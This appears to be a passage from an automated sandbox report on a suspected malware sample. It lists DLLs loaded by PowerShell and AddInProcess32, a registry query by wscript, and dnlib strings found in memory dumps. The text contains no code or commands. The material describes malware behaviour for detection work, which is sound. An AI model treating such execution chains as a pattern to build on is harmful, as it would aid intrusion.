                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
